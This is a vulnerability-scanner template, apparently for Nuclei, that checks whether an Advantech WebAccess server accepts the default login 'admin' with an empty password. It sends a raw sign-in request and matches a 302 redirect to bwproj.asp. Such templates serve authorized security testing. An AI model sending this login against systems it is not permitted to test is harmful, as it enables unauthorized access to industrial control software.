id: advantech-webaccess-default-login

info:
  name: ADVANTECH WebAccess 默认口令漏洞
  author: SleepingBag945
  severity: high

http:
  - raw:
      - |
        POST /broadweb/user/signin.asp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
        
        page=/broadweb/signin.asp&pos=&username=admin&password=&remMe=&submit1=登录

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
      - type: word
        words:
          - "bwproj.asp"
        part: header
        condition: and